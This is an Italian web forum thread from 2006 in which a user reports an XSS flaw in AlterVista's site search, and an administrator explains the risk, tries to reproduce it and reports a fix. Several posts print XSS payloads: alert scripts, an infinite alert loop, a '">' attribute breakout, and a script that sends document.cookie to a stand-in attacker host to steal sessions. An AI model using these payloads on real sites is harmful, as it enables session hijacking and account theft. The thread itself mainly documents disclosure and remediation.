Visualizzazione risultati 1 fino 22 di 22

Discussione: Admin Fixate Subito: Bug Xss Nella Funzione Di Ricerca

  1. #1
    Guest

    Predefinito Admin Fixate Subito: Bug Xss Nella Funzione Di Ricerca

    Admin, c'è un problema. Ogni tanto me ne vado in giro x la rete a trovare siti vulnerabili, ovviamente nn scasso le password e nn defaccio, vedo solo x poi segnalare ai webmaster. Ho trovato un bug nel vostro sito. provate a digitare nella ricerca tra i siti di altervista questo:
    Codice:
    <script>alert("Questo alert dimostra ke c'è una falla XSS");</script>
    Vi prego di fixare, nel caso del login potrebbe essere pericoloso, e magari qualche burlone dice ad un suo amico di digitare questo:
    Codice:
    <script>s = 0; while(s = 0) { alert("hihihi"); }
    ke si ritrova a dover killare il task.
    Fixate vi prego.
    P.S.=Spero non me ne vogliate perchè ho tentato di vedere se il vostro sito è vulnerbile... cmq nn scasso pass o defaccio sito testo solo sql injections, xss e altro....
    Ciao abweb, the hacker!

  2. #2
    Guest

    Predefinito

    in quale form hai provato?
    ho provato ad a cercare con il primo codice, ma non è successo niente.
    ma a proposito cosa doveva succedere?

  3. #3
    L'avatar di secretzone
    secretzone non è connesso Utente giovane
    Data registrazione
    03-02-2005
    Messaggi
    66

    Predefinito

    Credo che ci si possa loggare senza essere iscritti
    Secret Zone - suonerie, giochi java, software... GRATIS!
    Scambio Links - aumentare PageRank e posizionamento sui motori
    Inserimento nei motori - tool gratuito per indicizzare i nuovi siti
    Calcola il PageRank futuro
    Link Popularity e PageRank Tool - i tuoi links su Google, Msn, Yahoo e Dmoz

  4. #4
    Guest

    Predefinito

    In ogni caso questa cosa andava detta tramite pm ad un mod, per essere più discreti... ;-)

  5. #5
    Guest

    Predefinito

    Ti riferisci per caso a questo: http://forum.altervista.org/showthread.php?t=50346 ?


    Ciaooo!!!!!

  6. #6
    L'avatar di Gianluca
    Gianluca non è connesso Amministratore
    Data registrazione
    15-02-2001
    Messaggi
    18,035

    Predefinito

    Un bug di tipo XSS può essere sfruttato per far visualizzare dei contenuti (ed eseguire quindi codice javascript) come ad esempio questa finestra di alert tipicamente in pagine che vengono create in modo dinamico sulla base di informazioni postate ad esempio in un campo testo, come quello del motore di ricerca.

    A lato pratico questo genere di fenomeno viene sfruttato facendo cliccare in modo ingannevole, magari via email, un link all'utente ignaro per rubargli un cookie di sessione in un contesto di autenticazione.

    Per tranquillizzare secretzone un problema simile, anche nella peggiore delle ipotesi e cioè se fosse sfruttato con successo, nè consentirebbe il login a persone non iscritte, nè consentirebbe chiaramente il login non autorizzato al proprio spazio web, anche perchè il dominio di riferimento non ha associati cookies contenenti informazioni personali nè tantomento cookies che possono essere utilizzati per il login nel pannello.


    Se si fa riferimento alla funzione "cerca" in homepage, come mi pare di aver capito, non sembra che l'inserimento della stringa produca alcunchè, non è stato quindi possibile riprodurre il problema.
    Se hai delle informazioni più precise puoi postarle.
    Gianluca

  7. #7
    L'avatar di secretzone
    secretzone non è connesso Utente giovane
    Data registrazione
    03-02-2005
    Messaggi
    66

    Predefinito

    Io ho provato ad inserire il primo codice nel campo utente e password e il sito si è comportato come un normale login, portandomi poi ad una pagina contenente la frase Questo alert dimostra che....
    Non sono esperto di XSS e mi sono basato su quello che ho visto per avanzare un'ipotesi.

    Cmq, penso che questo sito sia stato creato molto bene riguardo la sicurezza e mi fido abbastanza del vostro lavoro ;)

    Grazie per la spiegazione.
    Secret Zone - suonerie, giochi java, software... GRATIS!
    Scambio Links - aumentare PageRank e posizionamento sui motori
    Inserimento nei motori - tool gratuito per indicizzare i nuovi siti
    Calcola il PageRank futuro
    Link Popularity e PageRank Tool - i tuoi links su Google, Msn, Yahoo e Dmoz

  8. #8
    L'avatar di Gianluca
    Gianluca non è connesso Amministratore
    Data registrazione
    15-02-2001
    Messaggi
    18,035

    Predefinito

    secretzone:

    se hai trovato un form in cui inserendo il codice suddetto ti compare una finestra di alert (con il tasto ok da premere, per intenderci) segnala la pagina in cui si trova, così si può verificare.
    Gianluca

  9. #9
    L'avatar di secretzone
    secretzone non è connesso Utente giovane
    Data registrazione
    03-02-2005
    Messaggi
    66

    Predefinito

    Citazione Originalmente inviato da Gianluca
    secretzone:

    se hai trovato un form in cui inserendo il codice suddetto ti compare una finestra di alert (con il tasto ok da premere, per intenderci) segnala la pagina in cui si trova, così si può verificare.
    Il form in cui ho provato, è quello presente su http://home.altervista.org/site/ in alto a destra. E' il form per l'accesso nell'area utenti.
    Ho inserito sia nel campo _user che in quello _password il primo codice postato da abweb, ovvero
    Codice:
    <script>alert("Questo alert dimostra ke c'è una falla XSS");</script>
    Non mi appare alcuna finestra su cui cliccare, ma solo la scritta di avviso contenuta contenuta nel codice. Ecco uno screen:



    Questo è tutto quello che fatto. Spero di essere stato + chiaro

    EDIT: ho messo uno screen maggiormente visibile
    Ultima modifica di secretzone : 24-03-2006 alle ore 13.33.35
    Secret Zone - suonerie, giochi java, software... GRATIS!
    Scambio Links - aumentare PageRank e posizionamento sui motori
    Inserimento nei motori - tool gratuito per indicizzare i nuovi siti
    Calcola il PageRank futuro
    Link Popularity e PageRank Tool - i tuoi links su Google, Msn, Yahoo e Dmoz

  10. #10
    L'avatar di funcool
    funcool non è connesso Utente storico
    Data registrazione
    05-02-2004
    Residenza
    Qui... Non lì, qui!
    Messaggi
    15,433

    Predefinito

    Citazione Originalmente inviato da secretzone
    Il form in cui ho provato, è quello presente su http://home.altervista.org/site/ in alto a destra. E' il form per l'accesso nell'area utenti.
    Ho inserito sia nel campo _user che in quello _password il primo codice postato da abweb, ovvero
    Codice:
    <script>alert("Questo alert dimostra ke c'è una falla XSS");</script>
    Non mi appare alcuna finestra su cui cliccare, ma solo la scritta di avviso contenuta contenuta nel codice. Ecco uno screen:



    Questo è tutto quello che fatto. Spero di essere stato + chiaro
    Quindi non ci sono errori in questo login.
    Mattia vi manda a FunCool - Matriz - Directory Gogol - Sfondo rosso per la Birmania
    «Tu mi dai fastidio perché ti credi tanto un Dio!» «Bè, dovrò pur prendere un modello a cui ispirarmi, no?» Woody Allen

  11. #11
    L'avatar di secretzone
    secretzone non è connesso Utente giovane
    Data registrazione
    03-02-2005
    Messaggi
    66

    Predefinito

    Citazione Originalmente inviato da funcool
    Quindi non ci sono errori in questo login.
    abweb ha scritto che potrebbe essere pericoloso se si usasse il secondo codice completo della parte che ha giustamente tralasciato.
    Poi nn so, perchè ripeto, nn ne so nulla di xss
    Secret Zone - suonerie, giochi java, software... GRATIS!
    Scambio Links - aumentare PageRank e posizionamento sui motori
    Inserimento nei motori - tool gratuito per indicizzare i nuovi siti
    Calcola il PageRank futuro
    Link Popularity e PageRank Tool - i tuoi links su Google, Msn, Yahoo e Dmoz

  12. #12
    Guest

    Predefinito

    non intendo il login!!! il campo "cerca tra i siti" è quello vulnerabile.
    posso provare sul forum?
    <script>alert('test');</script>
    ok sul forum non funziona, ma vi dico una cosa: *uso solo educativo non mi assumo nessuna responsabilità*: se il forum fosse stato buggato, un utente potrebbe aver scritto questo:
    Codice:
    <script>location='www.sitopirata.it/paginaraccoltadati.php?sessionid='+document.cookie;</script>
    e quella pagina è fatta per raccolgiere le session di php, quindi il pirata avrebbe accesso a tutti gli account degli utenti ke passano su quel topic.
    COMPRESI GLI ADIMN.
    Se quanlcuno vuole ke testi il suo sito x falle che possono portare anche a conseguenze come il DEFACCIAMENTO (cioè il sito viene distrutto), basta che mi da l'url.
    ciao, abweb, the hacker.
    Ultima modifica di abweb : 24-03-2006 alle ore 13.52.52

  13. #13
    L'avatar di SolitaryExplorer
    SolitaryExplorer non è connesso Utente storico
    Data registrazione
    10-08-2005
    Residenza
    Veneto
    Messaggi
    1,949

    Predefinito

    Ma è possibile che 'sto bug funzioni solo a te?!
    Usi Internet Explorer?!
    Ah, forse sarà che il mio caro Firefox è intelligente e non mi tradisce.
    Non offro assistenza privata. / Se vuoi anche tu una userbar come queste, basta chiedere.


  14. #14
    Guest

    Predefinito

    Ho provato con IE 6.0 SP1 e non succede nulla di preoccupante, mi segnala solo che non ha trovato risultati.
    Magari dicci la tua configurazione.


    Ciaoooo!!!!

  15. #15
    L'avatar di Gianluca
    Gianluca non è connesso Amministratore
    Data registrazione
    15-02-2001
    Messaggi
    18,035

    Predefinito

    abweb:

    inserendo la stringa che riporti (e qualsiasi altro codice javascript) nel campo "cerca tra i siti" si ha una pagina d'errore perchè chiaramente non vengono ritrovati risultati, ma quella pagina non visualizza la stringa di ricerca immessa, quindi materialmente non può essere oggetto di un XSS, lo stesso vale per il motore di ricerca sul web.

    Se hai trovato qualche sezione specifica del motore di ricerca in cui puoi riscontrare il problema posta pure uno screenshot in modo che sia possibile verificare e correggere la cosa.
    Gianluca

  16. #16
    L'avatar di Leo91
    Leo91 non è connesso Altervistiano Junior
    Data registrazione
    28-03-2004
    Residenza
    alle tue spalle
    Messaggi
    728

    Predefinito

    Anche a me funziona il link è questo http://siti.altervista.org/cgi-bin/search.cgi nella ricerca mettete quel codice javascript e... incantesimo.

    Edit: Non funzia più Cioè non c'è più il bug!
    Ultima modifica di Leo91 : 24-03-2006 alle ore 15.29.36

  17. #17
    Guest

    Predefinito

    è successo anke a me cn altri siti, cioè dopo aver usato 1 volta il bug x un po nn ti funziona A TE!

  18. #18
    L'avatar di Gianluca
    Gianluca non è connesso Amministratore
    Data registrazione
    15-02-2001
    Messaggi
    18,035

    Predefinito

    In ogni modo chiunque dovesse riscontrare questo problema può postare qui allegando però uno screenshot della pagina generata con il relativo alert.
    Gianluca

  19. #19
    Guest

    Predefinito

    non è comparsa l'alert, ma da questa immagine si vede il bug.

  20. #20
    L'avatar di gve
    gve
    gve non è connesso Utente storico
    Data registrazione
    26-01-2003
    Residenza
    Brescia
    Messaggi
    2,964

    Predefinito

    Il bug che vedo io e` leggermente diverso da quel che avevo capito dalle tue spiegazioni, abweb: e` relativo al fatto che i caratteri speciali, come " (apici doppi) e < o > non vengono tradotti in modo sicuro o rifiutati ma lasciati come sono. Provate a far precedere i due simboli:
    ">
    a uno qualsiasi degli esempi forniti da abweb e vedrete.
    | Regolamento del Forum | Regolamento di AlterVista | FAQ di AlterVista | Netiquette |

    GVE = GVE Virtual Extension
    AVCM #: 6637

  21. #21
    L'avatar di Gianluca
    Gianluca non è connesso Amministratore
    Data registrazione
    15-02-2001
    Messaggi
    18,035

    Predefinito

    Sul template Home>>Motore di ricerca, e sigli altri templates che ripropongono nel campo text la query di ricerca il problema è stato corretto.
    Gianluca

  22. #22
    Guest

    Predefinito

    allora la mia descrizione di prima è esatta, cioè viene eseguito codice javascript, e si vede che viene interpretato anke dalla stringha tagliata e dal "> fuori... cioè gli alert a volte si vedono e funzionano.

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •